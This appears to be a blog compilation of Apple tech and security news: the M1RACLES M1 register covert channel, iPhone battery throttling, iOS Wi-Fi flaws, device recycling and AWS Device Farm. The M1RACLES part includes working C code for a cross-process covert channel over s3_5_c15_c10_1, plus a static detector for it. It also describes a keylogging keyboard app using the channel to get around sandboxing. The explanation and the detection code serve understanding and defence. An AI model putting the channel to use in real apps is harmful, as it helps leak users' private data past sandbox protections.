Surprised to see Bad Apple!! used as the demo in a security vulnerability PoC

Hector Martin, a security researcher based in Japan, found a flaw in the Apple M1: two processes can pass data to each other through the CPU itself, without going through any interface macOS Big Sur provides and regardless of which user or sandbox they run under, so it can be used to get around sandbox restrictions. Following current fashion he gave it a catchy name, "M1RACLES: M1ssing Register Access Controls Leak EL0 State", and the corresponding CVE is CVE-2021-30747.

First, the unusual part: the PoC video is on YouTube, and the author used Bad Apple!! as the demo, which is obviously a pun:

This looks like the shadow-art version from back in the day, and seeing it again is nostalgic... When I first saw it I had a "what a waste of talent" feeling, but it has to be said it is a classic.

There is a discussion on Hacker News worth reading: "M1racles: An Apple M1 covert channel vulnerability (m1racles.com)".

According to the author, the Apple A14 shares the M1's architecture and so has the same problem; he does not own an iPhone himself and could not test it directly, though the A14 has since been confirmed as affected:

Are other Apple CPUs affected?

Maybe, but I don't have an iPhone or a DTK to test it. Feel free to report back if you try it. The A14 has been confirmed as also affected, which is expected, as it is a close relative of the M1.

The author also thinks this is not a serious problem on macOS. The s3_5_c15_c10_1 register is readable and writable from any user-mode process, so there is nothing to "exploit"; the catch is that a covert channel only moves data between two processes that are both already under the attacker's control, and with that kind of foothold there are plenty of better options:

So you're telling me I shouldn't worry?

Yes.

What, really?

Really, nobody's going to actually find a nefarious use for this flaw in practical circumstances. Besides, there are already a million side channels you can use for cooperative cross-process communication (e.g. cache stuff), on every system. Covert channels can't leak data from uncooperative apps or systems.

Actually, that one's worth repeating: Covert channels are completely useless unless your system is already compromised.
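To make the "cooperative" part concrete, here is an added example (my own code, not from the original post or from the M1RACLES PoC) of how two cooperating processes turn a 2-bit register that every EL0 process can read and write into a byte stream. The clock/data framing is an assumption of mine, not the PoC's actual protocol; the register is simulated with a global so the code runs on any machine, and the `-DM1RACLES_REAL_REGISTER` build for Apple Silicon uses assumed inline-assembly syntax for s3_5_c15_c10_1.

```c
/* Added example, not code from the original post or from the M1RACLES PoC:
 * how two cooperating processes turn a 2-bit register that every EL0 process
 * can read and write into a byte stream. The clock/data framing is my own
 * assumption, not the PoC's actual protocol. The register is simulated with a
 * global so the code runs on any machine; build with -DM1RACLES_REAL_REGISTER
 * on Apple Silicon to hit s3_5_c15_c10_1 itself (assumed inline-asm syntax). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CLK_BIT 0x1u  /* bit 0: sender toggles it once per transmitted bit */
#define DAT_BIT 0x2u  /* bit 1: the bit being transmitted */

#if defined(M1RACLES_REAL_REGISTER) && defined(__aarch64__)
static inline uint64_t chan_read(void) {
    uint64_t v;
    __asm__ volatile("mrs %0, s3_5_c15_c10_1" : "=r"(v));
    return v & 3u;
}
static inline void chan_write(uint64_t v) {
    __asm__ volatile("msr s3_5_c15_c10_1, %0" : : "r"(v & 3u));
}
#else
static volatile uint64_t fake_register;  /* stand-in for the shared register */
static inline uint64_t chan_read(void) { return fake_register & 3u; }
static inline void chan_write(uint64_t v) { fake_register = v & 3u; }
#endif

typedef struct { uint8_t clk; } tx_state;
typedef struct { uint8_t last_clk, acc; int nbits; } rx_state;

static void tx_init(tx_state *t) { t->clk = 0; chan_write(0); }
static void rx_init(rx_state *r) {
    r->last_clk = (uint8_t)(chan_read() & CLK_BIT);
    r->acc = 0;
    r->nbits = 0;
}

/* Sender: flip the clock bit so the receiver knows a fresh bit is present. */
static void tx_bit(tx_state *t, unsigned bit) {
    t->clk ^= CLK_BIT;
    chan_write(t->clk | (bit ? DAT_BIT : 0u));
}

/* Receiver: sample the register once. Only a clock edge counts, so polling
 * faster than the sender (seeing the same value repeatedly) is harmless.
 * Returns 1 and stores a byte in *out once eight bits have been collected. */
static int rx_poll(rx_state *r, uint8_t *out) {
    uint64_t v = chan_read();
    uint8_t clk = (uint8_t)(v & CLK_BIT);
    if (clk == r->last_clk) return 0;
    r->last_clk = clk;
    r->acc = (uint8_t)((r->acc << 1) | ((v & DAT_BIT) ? 1u : 0u));
    if (++r->nbits == 8) {
        *out = r->acc;
        r->acc = 0;
        r->nbits = 0;
        return 1;
    }
    return 0;
}

/* Same-thread loopback: send msg bit by bit, polling the receiver `oversample`
 * times per bit, as a faster receiver would. Returns the bytes recovered. */
size_t covert_loopback(const char *msg, char *out, size_t cap, int oversample) {
    tx_state tx; rx_state rx;
    size_t got = 0;
    tx_init(&tx);
    rx_init(&rx);
    for (size_t i = 0; msg[i] != '\0'; i++) {
        for (int b = 7; b >= 0; b--) {
            tx_bit(&tx, ((unsigned char)msg[i] >> b) & 1u);
            for (int k = 0; k < oversample; k++) {
                uint8_t byte;
                if (rx_poll(&rx, &byte) && got + 1 < cap) out[got++] = (char)byte;
            }
        }
    }
    out[got] = '\0';
    return got;
}

/* 1 if the constructed message "M1RACLES" survives the channel intact. */
int covert_selftest(int oversample) {
    char out[32];
    size_t n = covert_loopback("M1RACLES", out, sizeof out, oversample);
    return n == 8 && strcmp(out, "M1RACLES") == 0;
}

int main(void) {
    char out[32];
    covert_loopback("Bad Apple!!", out, sizeof out, 4);
    printf("received: %s\n", out);
    return 0;
}
```

In real use the sender and receiver are two separate processes, and the loopback hides the one thing that makes such channels slow: the sender must not toggle the clock twice before the receiver has polled, or the receiver sees no edge and silently loses two bits, so a real protocol needs either a rate limit or an acknowledgement path. It also shows why the FAQ calls the channel useless against uncooperative software: nothing here can read data out of a process that does not deliberately run the `tx_bit` side.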

The more obvious problem is the privacy issue on iOS, though the App Store review process provides a basic safeguard (then again, an app author could always plant a deliberate RCE bug and pull the code in at runtime...):

What about iOS?

iOS is affected, like all other OSes. There are unique privacy implications to this vulnerability on iOS, as it could be used to bypass some of its stricter privacy protections. For example, keyboard apps are not allowed to access the internet, for privacy reasons. A malicious keyboard app could use this vulnerability to send text that the user types to another malicious app, which could then send it to the internet.

However, since iOS apps distributed through the App Store are not allowed to build code at runtime (JIT), Apple can automatically scan them at submission time and reliably detect any attempts to exploit this vulnerability using static analysis (which they already use). We do not have further information on whether Apple is planning to deploy these checks (or whether they have already done so), but they are aware of the potential issue and it would be reasonable to expect they will. It is even possible that the existing automated analysis already rejects any attempts to use system registers directly.
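The static check the FAQ describes is simple in principle: with no JIT, any access to the register has to appear as an `mrs`/`msr` instruction somewhere in the shipped binary. The following is an added example of such a scan, my own illustration rather than Apple's actual review tooling; the instruction encodings come from the ARMv8 MSR/MRS (register) format, and the sample code bytes are constructed for this example.

```c
/* Added example, my own illustration rather than Apple's actual review
 * tooling: a static scan of AArch64 machine code for MRS/MSR instructions that
 * touch s3_5_c15_c10_1, the check the FAQ above says is feasible because App
 * Store binaries cannot JIT. Encodings follow the ARMv8 MSR/MRS (register)
 * format; the sample code bytes are constructed for this example. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* MSR/MRS (register): 1101 0101 00 L 1 o0 op1 CRn CRm op2 Rt
 * L=1 for MRS (read). Bits 4:0 hold the general register Rt. */
#define MSR_BASE    0xD5100000u
#define MRS_BASE    0xD5300000u
#define SYSREG_MASK 0xFFFFFFE0u   /* compare everything except Rt */

/* Build the o0/op1/CRn/CRm/op2 field for s<op0>_<op1>_c<CRn>_c<CRm>_<op2>;
 * o0 is the low bit of op0 (op0 is always 2 or 3). */
uint32_t sysreg_fields(unsigned op0, unsigned op1, unsigned crn,
                       unsigned crm, unsigned op2) {
    return ((op0 & 1u) << 19) | (op1 << 16) | (crn << 12) | (crm << 8) | (op2 << 5);
}

typedef struct { size_t offset; int is_read; unsigned rt; } sysreg_hit;

/* Scan little-endian AArch64 code for accesses to one system register.
 * Returns the number of hits; at most cap are stored in hits[]. */
size_t scan_sysreg(const uint8_t *code, size_t len, uint32_t reg_fields,
                   sysreg_hit *hits, size_t cap) {
    size_t n = 0;
    for (size_t off = 0; off + 4 <= len; off += 4) {
        uint32_t insn = (uint32_t)code[off] | (uint32_t)code[off + 1] << 8 |
                        (uint32_t)code[off + 2] << 16 | (uint32_t)code[off + 3] << 24;
        uint32_t key = insn & SYSREG_MASK;
        int is_read;
        if (key == (MSR_BASE | reg_fields)) is_read = 0;
        else if (key == (MRS_BASE | reg_fields)) is_read = 1;
        else continue;
        if (n < cap) {
            hits[n].offset = off;
            hits[n].is_read = is_read;
            hits[n].rt = insn & 0x1Fu;
        }
        n++;
    }
    return n;
}

/* Constructed sample: mov x0,#1; msr s3_5_c15_c10_1,x0; mrs x1,s3_5_c15_c10_1;
 * mrs x2,ctr_el0 (a harmless sysreg read that must not match); ret. */
static const uint8_t sample_code[] = {
    0x20, 0x00, 0x80, 0xD2,   /* 0xD2800020 mov x0, #1 */
    0x20, 0xFA, 0x1D, 0xD5,   /* 0xD51DFA20 msr s3_5_c15_c10_1, x0 */
    0x21, 0xFA, 0x3D, 0xD5,   /* 0xD53DFA21 mrs x1, s3_5_c15_c10_1 */
    0x22, 0x00, 0x3B, 0xD5,   /* 0xD53B0022 mrs x2, ctr_el0 (s3_3_c0_c0_1) */
    0xC0, 0x03, 0x5F, 0xD6,   /* 0xD65F03C0 ret */
};

/* 1 if the scan finds exactly the write at offset 4 and the read at offset 8. */
int scan_selftest(void) {
    sysreg_hit hits[8];
    size_t n = scan_sysreg(sample_code, sizeof sample_code,
                           sysreg_fields(3, 5, 15, 10, 1), hits, 8);
    return n == 2 && hits[0].offset == 4 && !hits[0].is_read && hits[0].rt == 0 &&
           hits[1].offset == 8 && hits[1].is_read && hits[1].rt == 1;
}

int main(void) {
    sysreg_hit hits[8];
    size_t n = scan_sysreg(sample_code, sizeof sample_code,
                           sysreg_fields(3, 5, 15, 10, 1), hits, 8);
    for (size_t i = 0; i < n; i++)
        printf("offset %zu: %s s3_5_c15_c10_1 via x%u\n", hits[i].offset,
               hits[i].is_read ? "mrs (read)" : "msr (write)", hits[i].rt);
    return 0;
}
```

Run over the text sections of a Mach-O this flags both directions of access while ignoring legitimate system-register reads such as `ctr_el0`. Two caveats a reviewer would add: raw word matching can produce false positives in data mixed into code, and it only works because App Store binaries cannot generate code at runtime, which is exactly the condition the FAQ relies on.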

iPhone battery and performance

Saw this Reddit post via Hacker News: "PSA: iPhone slow? Try replacing your battery!".

He says his iPhone 6S had been very slow and he assumed iOS 11 was to blame, but then found that his brother's iPhone 6 Plus, also on iOS 11, was much faster... so he investigated and eventually decided to replace the battery:

My iPhone 6S has been very slow these past few weeks, and even after updating multiple times, it was still slow. Couldn’t figure out why, but just thought that iOS 11 was still awful to me. Then I used my brother’s iPhone 6 Plus and his was... faster than mine? This is when I knew something was wrong. So, I did some research, and decided to replace my battery.

After replacing the battery the speed came back; the screenshot above is from before the swap and the one below from after:

So does it throttle when the battery can no longer deliver enough power?

The benchmark used on iOS is Geekbench 4, and Geekbench publishes reference scores at iOS Benchmarks - Geekbench Browser. If the phone is still slow when fully charged, freshly rebooted, and with nothing running in the background, it may be the same problem.

Unlocking an iPhone with Diper ID...

Saw this terrible thing called Diper ID on Twitter:

Looking it up, this video shows how it is operated:

This obviously has security problems XDDD

iOS RCE over Wi-Fi...

From the description in "About the security content of iOS 10.3.1":

Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later
Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip
Description: A stack buffer overflow was addressed through improved input validation.
CVE-2017-6975: Gal Beniamini of Google Project Zero

That description does not look good: arbitrary code execution on the Wi-Fi chip by anyone within radio range, with no user interaction mentioned...

How Apple devices get scrapped: Hong Kong

Bloomberg's "Where Your iPhone Goes to Die (and Be Reborn)" gives a rough description of what happens to Apple devices after they are collected for recycling.

The story covers a scrapping plant in Hong Kong, but because of contracts with Apple nobody involved can be named:

While global brands including HP, Huawei, Amazon and Microsoft also have detailed protocols for recycling their products, Apple’s are the most rigid and exacting, according to people involved in the processes, who declined to be identified because they’re not authorized to speak about clients.

Bloomberg did get some on-the-record comments from Apple:

"I think people expect it of us, I think our customers hold us to a high standard," Lisa Jackson, Apple’s head of environmental affairs, said by phone from the company’s Cupertino headquarters. "It’s difficult, because these are incredibly complex pieces of product."

It also mentions what the recyclers pay to acquire devices:

After a quick test, the recycler will either buy the phone or offer to scrap it for free. In the U.S., payouts for working phones range from $100 for the smallest-capacity iPhone 4, to $350 for the largest iPhone 6 Plus. More stringent testing then shows whether the handset can be resold or must be scrapped.

There are also Bloomberg's charts, showing the handling principles and the rough recycling flow:

AWS Device Farm now supports iOS devices

A few days ago AWS announced that Device Farm would add iOS support on 8/4, and it has just appeared: "AWS Device Farm adds support for iOS – Test your iOS, Android and Fire OS apps against real devices in the AWS Cloud".

The "Device List" shows all supported models; on the iOS side it covers iPad, iPhone, and iPod touch, though apparently only the newer models are supported...

AWS Device Farm to support iOS devices

Just saw it on Twitter first: "Coming Soon – AWS Device Farm Support for iOS Apps".

We plan to launch support for iOS on August 4, 2015 with support for the following test automation frameworks:

They must be working with Apple on this; it feels like there will be thousands of devices running... XD

iOS 8 DoS attack: forcing an endless reboot loop

Saw this news retweeted on Twitter:

A 0-day exploit presented at RSA Conference: "iOS 8 Vulnerability Lets Hackers Crash Any iPhone and iPad Within Wi-Fi Range".

Adi Sharabani and Yair Amit of Mobile security firm Skycure presented their latest research, titled "No iOS Zone", at the RSA security conference in San Francisco on Tuesday.

Demo video:

The cause is that iOS crashes and reboots when handling a malicious SSL certificate:

All an attacker need to do is create a malicious wireless network that uses the Wi-Fi connection in order to manipulate SSL certificates sent to iOS handsets.

Until there is a fix, the practical mitigation is to turn Wi-Fi off, or at least stay off untrusted networks:

Another best measure is to simply avoid the free wireless networks you find in the street providing public Internet access.

Charging the iPhone 6 and iPhone 6 Plus faster

From "This killer trick will charge your iPhone 6 in half the time": they found that charging with the iPad's 12W charger is much faster:

You can use a 12-watt iPad charger to juice up the iPhone 6 and iPhone 6 Plus in half the time when compared to the 5-watt iPhone charger your device ships with by default.